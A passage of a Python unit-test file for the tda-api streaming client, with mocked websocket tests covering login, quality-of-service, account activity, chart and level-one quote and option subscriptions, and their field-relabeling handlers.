ws_connect.assert_awaited_once_with(ANY)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_ssl_context(self, ws_connect):
self.client = StreamClient(self.http_client, ssl_context='ssl_context')
self.http_client.get_user_principals.return_value = MockResponse(
account_principals(), 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
ws_connect.assert_awaited_once_with(ANY, ssl='ssl_context')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_request_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'LOGIN')
response['response'][0]['requestid'] = 9999
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected requestid: 9999'):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_service(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'NOT_ADMIN', 'LOGIN')
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected service: NOT_ADMIN'):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_command(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'NOT_LOGIN')
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected command: NOT_LOGIN'):
await self.client.login()
##########################################################################
# QOS
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_qos_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'ADMIN', 'QOS'))]
await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS)
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'ADMIN',
'command': 'QOS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'qoslevel': '0'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_qos_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'ADMIN', 'QOS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS)
socket.recv.assert_awaited_once()
##########################################################################
# ACCT_ACTIVITY
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_subs_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'ACCT_ACTIVITY', 'SUBS'))]
await self.client.account_activity_sub()
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'ACCT_ACTIVITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'streamerSubscriptionKeys-keys-key',
'fields': '0,1,2,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'ACCT_ACTIVITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.account_activity_sub()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'ACCT_ACTIVITY',
'timestamp': 1591754497594,
'command': 'SUBS',
'content': [
{
'seq': 1,
'key': 'streamerSubscriptionKeys-keys-key',
'1': '1001',
'2': 'OrderEntryRequest',
'3': ''
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'ACCT_ACTIVITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.account_activity_sub()
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_account_activity_handler(handler)
self.client.add_account_activity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'ACCT_ACTIVITY',
'timestamp': 1591754497594,
'command': 'SUBS',
'content': [
{
'seq': 1,
'key': 'streamerSubscriptionKeys-keys-key',
'ACCOUNT': '1001',
'MESSAGE_TYPE': 'OrderEntryRequest',
'MESSAGE_DATA': ''
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# CHART_EQUITY
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_subs_and_add_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'CHART_EQUITY', 'SUBS'))]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,3,4,5,6,7,8'
}
})
socket.reset_mock()
socket.recv.side_effect = [json.dumps(self.success_response(
2, 'CHART_EQUITY', 'ADD'))]
await self.client.chart_equity_add(['INTC'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_EQUITY',
'command': 'ADD',
'requestid': '2',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'INTC',
'fields': '0,1,2,3,4,5,6,7,8'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'CHART_EQUITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_add_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response_subs = self.success_response(1, 'CHART_EQUITY', 'SUBS')
response_add = self.success_response(2, 'CHART_EQUITY', 'ADD')
response_add['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(response_subs),
json.dumps(response_add)]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_add(['INTC'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'CHART_EQUITY',
'timestamp': 1590597641293,
'command': 'SUBS',
'content': [
{
'seq': 985,
'key': 'MSFT',
'1': 179.445,
'2': 179.57,
'3': 179.4299,
'4': 179.52,
'5': 53742.0,
'6': 339,
'7': 1590597540000,
'8': 18409
},
{
'seq': 654,
'key': 'GOOG',
'1': 1408.8,
'2': 1408.8,
'3': 1408.1479,
'4': 1408.1479,
'5': 500.0,
'6': 339,
'7': 1590597540000,
'8': 18409
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'CHART_EQUITY',
'timestamp': 1590597641293,
'command': 'SUBS',
'content': [
{
'seq': 985,
'key': 'MSFT',
'OPEN_PRICE': 179.445,
'HIGH_PRICE': 179.57,
'LOW_PRICE': 179.4299,
'CLOSE_PRICE': 179.52,
'VOLUME': 53742.0,
'SEQUENCE': 339,
'CHART_TIME': 1590597540000,
'CHART_DAY': 18409
},
{
'seq': 654,
'key': 'GOOG',
'OPEN_PRICE': 1408.8,
'HIGH_PRICE': 1408.8,
'LOW_PRICE': 1408.1479,
'CLOSE_PRICE': 1408.1479,
'VOLUME': 500.0,
'SEQUENCE': 339,
'CHART_TIME': 1590597540000,
'CHART_DAY': 18409
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# CHART_FUTURES
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_subs_and_add_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'CHART_FUTURES', 'SUBS'))]
await self.client.chart_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,3,4,5,6'
}
})
socket.reset_mock()
socket.recv.side_effect = [json.dumps(self.success_response(
2, 'CHART_FUTURES', 'ADD'))]
await self.client.chart_futures_add(['/ZC'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_FUTURES',
'command': 'ADD',
'requestid': '2',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ZC',
'fields': '0,1,2,3,4,5,6'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'CHART_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_add_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response_subs = self.success_response(1, 'CHART_FUTURES', 'SUBS')
response_add = self.success_response(2, 'CHART_FUTURES', 'ADD')
response_add['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(response_subs),
json.dumps(response_add)]
await self.client.chart_futures_subs(['/ES', '/CL'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_futures_add(['/ZC'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'CHART_FUTURES',
'timestamp': 1590597913941,
'command': 'SUBS',
'content': [
{
'seq': 0,
'key': '/ES',
'1': 1590597840000,
'2': 2996.25,
'3': 2997.25,
'4': 2995.25,
'5': 2997.25,
'6': 1501.0
},
{
'seq': 0,
'key': '/CL',
'1': 1590597840000,
'2': 33.34,
'3': 33.35,
'4': 33.32,
'5': 33.35,
'6': 186.0
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_futures_handler(handler)
self.client.add_chart_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'CHART_FUTURES',
'timestamp': 1590597913941,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'CHART_TIME': 1590597840000,
'OPEN_PRICE': 2996.25,
'HIGH_PRICE': 2997.25,
'LOW_PRICE': 2995.25,
'CLOSE_PRICE': 2997.25,
'VOLUME': 1501.0
}, {
'seq': 0,
'key': '/CL',
'CHART_TIME': 1590597840000,
'OPEN_PRICE': 33.34,
'HIGH_PRICE': 33.35,
'LOW_PRICE': 33.32,
'CLOSE_PRICE': 33.35,
'VOLUME': 186.0
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# QUOTE
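    # Level one equity (QUOTE) tests: requesting all fields, requesting a
    # subset of LevelOneEquityFields (field 0, SYMBOL, is included in the
    # request even when omitted), surfacing failure codes, and relabeling of
    # numbered quote fields in both sync and async handlers.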
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' +
'36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,' +
'52')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.LevelOneEquityFields.SYMBOL,
StreamClient.LevelOneEquityFields.BID_PRICE,
StreamClient.LevelOneEquityFields.ASK_PRICE,
StreamClient.LevelOneEquityFields.QUOTE_TIME,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,11'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.LevelOneEquityFields.BID_PRICE,
StreamClient.LevelOneEquityFields.ASK_PRICE,
StreamClient.LevelOneEquityFields.QUOTE_TIME,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,11'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'QUOTE', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_quote_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'QUOTE',
'command': 'SUBS',
'timestamp': 1590186642440,
'content': [{
'key': 'GOOG',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '02079K107',
'1': 1404.92,
'2': 1412.99,
'3': 1411.89,
'4': 1,
'5': 2,
'6': 'P',
'7': 'K',
'8': 1309408,
'9': 2,
'10': 71966,
'11': 71970,
'12': 1412.76,
'13': 1391.83,
'14': ' ',
'15': 1410.42,
'16': 'q',
'17': True,
'18': True,
'19': 1412.991,
'20': 1411.891,
'21': 1309409,
'22': 18404,
'23': 18404,
'24': 0.0389,
'25': 'Alphabet Inc. - Class C Capital Stock',
'26': 'P',
'27': 4,
'28': 1396.71,
'29': 1.47,
'30': 1532.106,
'31': 1013.536,
'32': 28.07,
'33': 6.52,
'34': 5.51,
'35': 122.0,
'36': 123.0,
'37': 123123.0,
'38': 123214.0,
'39': 'NASD',
'40': ' ',
'41': True,
'42': True,
'43': 1410.42,
'44': 699,
'45': 57600,
'46': 18404,
'47': 1.48,
'48': 'Normal',
'49': 1410.42,
'50': 1590191970734,
'51': 1590191966446,
'52': 1590177600617
}, {
'key': 'MSFT',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '594918104',
'1': 183.65,
'2': 183.7,
'3': 183.65,
'4': 3,
'5': 10,
'6': 'P',
'7': 'P',
'8': 20826898,
'9': 200,
'10': 71988,
'11': 71988,
'12': 184.46,
'13': 182.54,
'14': ' ',
'15': 183.51,
'16': 'q',
'17': True,
'18': True,
'19': 182.65,
'20': 182.7,
'21': 20826899,
'22': 18404,
'23': 18404,
'24': 0.0126,
'25': 'Microsoft Corporation - Common Stock',
'26': 'K',
'27': 4,
'28': 183.19,
'29': 0.14,
'30': 190.7,
'31': 119.01,
'32': 32.3555,
'33': 2.04,
'34': 1.11,
'35': 122.0,
'36': 123.0,
'37': 123123.0,
'38': 123214.0,
'39': 'NASD',
'40': '2020-05-20 00:00:00.000',
'41': True,
'42': True,
'43': 183.51,
'44': 16890,
'45': 57600,
'46': 18404,
                    '47': 1.49,
                    '48': 'Normal',
'49': 183.51,
'50': 1590191988960,
'51': 1590191988957,
'52': 1590177600516
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'QUOTE', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_equity_handler(handler)
self.client.add_level_one_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'QUOTE',
'command': 'SUBS',
'timestamp': 1590186642440,
'content': [{
'key': 'GOOG',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '02079K107',
'BID_PRICE': 1404.92,
'ASK_PRICE': 1412.99,
'LAST_PRICE': 1411.89,
'BID_SIZE': 1,
'ASK_SIZE': 2,
'ASK_ID': 'P',
'BID_ID': 'K',
'TOTAL_VOLUME': 1309408,
'LAST_SIZE': 2,
'TRADE_TIME': 71966,
'QUOTE_TIME': 71970,
'HIGH_PRICE': 1412.76,
'LOW_PRICE': 1391.83,
'BID_TICK': ' ',
'CLOSE_PRICE': 1410.42,
'EXCHANGE_ID': 'q',
'MARGINABLE': True,
'SHORTABLE': True,
'ISLAND_BID_DEPRECATED': 1412.991,
'ISLAND_ASK_DEPRECATED': 1411.891,
'ISLAND_VOLUME_DEPRECATED': 1309409,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'VOLATILITY': 0.0389,
'DESCRIPTION': 'Alphabet Inc. - Class C Capital Stock',
'LAST_ID': 'P',
'DIGITS': 4,
'OPEN_PRICE': 1396.71,
'NET_CHANGE': 1.47,
'HIGH_52_WEEK': 1532.106,
'LOW_52_WEEK': 1013.536,
'PE_RATIO': 28.07,
'DIVIDEND_AMOUNT': 6.52,
'DIVIDEND_YIELD': 5.51,
'ISLAND_BID_SIZE_DEPRECATED': 122.0,
'ISLAND_ASK_SIZE_DEPRECATED': 123.0,
'NAV': 123123.0,
'FUND_PRICE': 123214.0,
'EXCHANGE_NAME': 'NASD',
'DIVIDEND_DATE': ' ',
'IS_REGULAR_MARKET_QUOTE': True,
'IS_REGULAR_MARKET_TRADE': True,
'REGULAR_MARKET_LAST_PRICE': 1410.42,
'REGULAR_MARKET_LAST_SIZE': 699,
'REGULAR_MARKET_TRADE_TIME': 57600,
'REGULAR_MARKET_TRADE_DAY': 18404,
'REGULAR_MARKET_NET_CHANGE': 1.48,
'SECURITY_STATUS': 'Normal',
'MARK': 1410.42,
'QUOTE_TIME_IN_LONG': 1590191970734,
'TRADE_TIME_IN_LONG': 1590191966446,
'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600617
}, {
'key': 'MSFT',
'delayed': False,
'assetMainType': 'EQUITY',
'cusip': '594918104',
'BID_PRICE': 183.65,
'ASK_PRICE': 183.7,
'LAST_PRICE': 183.65,
'BID_SIZE': 3,
'ASK_SIZE': 10,
'ASK_ID': 'P',
'BID_ID': 'P',
'TOTAL_VOLUME': 20826898,
'LAST_SIZE': 200,
'TRADE_TIME': 71988,
'QUOTE_TIME': 71988,
'HIGH_PRICE': 184.46,
'LOW_PRICE': 182.54,
'BID_TICK': ' ',
'CLOSE_PRICE': 183.51,
'EXCHANGE_ID': 'q',
'MARGINABLE': True,
'SHORTABLE': True,
'ISLAND_BID_DEPRECATED': 182.65,
'ISLAND_ASK_DEPRECATED': 182.7,
'ISLAND_VOLUME_DEPRECATED': 20826899,
'QUOTE_DAY': 18404,
'TRADE_DAY': 18404,
'VOLATILITY': 0.0126,
'DESCRIPTION': 'Microsoft Corporation - Common Stock',
'LAST_ID': 'K',
'DIGITS': 4,
'OPEN_PRICE': 183.19,
'NET_CHANGE': 0.14,
'HIGH_52_WEEK': 190.7,
'LOW_52_WEEK': 119.01,
'PE_RATIO': 32.3555,
'DIVIDEND_AMOUNT': 2.04,
'DIVIDEND_YIELD': 1.11,
'ISLAND_BID_SIZE_DEPRECATED': 122.0,
'ISLAND_ASK_SIZE_DEPRECATED': 123.0,
'NAV': 123123.0,
'FUND_PRICE': 123214.0,
'EXCHANGE_NAME': 'NASD',
'DIVIDEND_DATE': '2020-05-20 00:00:00.000',
'IS_REGULAR_MARKET_QUOTE': True,
'IS_REGULAR_MARKET_TRADE': True,
'REGULAR_MARKET_LAST_PRICE': 183.51,
'REGULAR_MARKET_LAST_SIZE': 16890,
'REGULAR_MARKET_TRADE_TIME': 57600,
'REGULAR_MARKET_TRADE_DAY': 18404,
                'REGULAR_MARKET_NET_CHANGE': 1.49,
                'SECURITY_STATUS': 'Normal',
'MARK': 183.51,
'QUOTE_TIME_IN_LONG': 1590191988960,
'TRADE_TIME_IN_LONG': 1590191988957,
'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600516
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# OPTION
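    # Level one option (OPTION) tests mirror the equity tests: all-fields and
    # partial-field SUBS requests keyed by option symbols, failure handling,
    # and handler relabeling of the numbered option fields.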
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' +
'36,37,38,39,40,41')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.LevelOneOptionFields.SYMBOL,
StreamClient.LevelOneOptionFields.BID_PRICE,
StreamClient.LevelOneOptionFields.ASK_PRICE,
StreamClient.LevelOneOptionFields.VOLATILITY,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,2,3,10'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_success_some_fields_no_symbol(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'OPTION', 'SUBS'))]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'], fields=[
StreamClient.LevelOneOptionFields.BID_PRICE,
StreamClient.LevelOneOptionFields.ASK_PRICE,
StreamClient.LevelOneOptionFields.VOLATILITY,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'OPTION',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG_052920C620,MSFT_052920C145',
'fields': '0,2,3,10'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'OPTION', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_option_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'OPTION',
'timestamp': 1590244265891,
'command': 'SUBS',
'content': [{
'key': 'MSFT_052920C145',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0MSFT.ET00145000',
'1': 'MSFT May 29 2020 145 Call (Weekly)',
'2': 38.05,
'3': 39.05,
'4': 38.85,
'5': 38.85,
'6': 38.85,
'7': 38.581,
'8': 2,
'9': 7,
'10': 5,
'11': 57599,
'12': 53017,
'13': 38.51,
'14': 18404,
'15': 18404,
'16': 2020,
'17': 100,
'18': 2,
'19': 38.85,
'20': 6,
'21': 116,
'22': 1,
'23': 0.3185,
'24': 145,
'25': 'C',
'26': 'MSFT',
'27': 5,
'29': 0.34,
'30': 29,
'31': 6,
'32': 1,
'33': 0,
'34': 0,
'35': 0.1882,
'37': 'Normal',
'38': 38.675,
'39': 183.51,
'40': 'S',
'41': 38.55
}, {
'key': 'GOOG_052920C620',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0GOOG.ET00620000',
'1': 'GOOG May 29 2020 620 Call (Weekly)',
'2': 785.2,
'3': 794,
'7': 790.42,
'10': 238.2373,
'11': 57594,
'12': 68400,
'13': 790.42,
'14': 18404,
'16': 2020,
'17': 100,
'18': 2,
'20': 1,
'21': 6,
'24': 620,
'25': 'C',
'26': 'GOOG',
'27': 5,
'29': -0.82,
'30': 29,
'31': 6,
'32': 0.996,
'33': 0,
'34': -0.3931,
'35': 0.023,
'36': 0.1176,
'37': 'Normal',
'38': 789.6,
'39': 1410.42,
'40': 'S',
'41': 789.6
}]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'OPTION', 'SUBS')),
json.dumps(stream_item)]
await self.client.level_one_option_subs(
['GOOG_052920C620', 'MSFT_052920C145'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_level_one_option_handler(handler)
self.client.add_level_one_option_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'OPTION',
'timestamp': 1590244265891,
'command': 'SUBS',
'content': [{
'key': 'MSFT_052920C145',
'delayed': False,
'assetMainType': 'OPTION',
'cusip': '0MSFT.ET00145000',
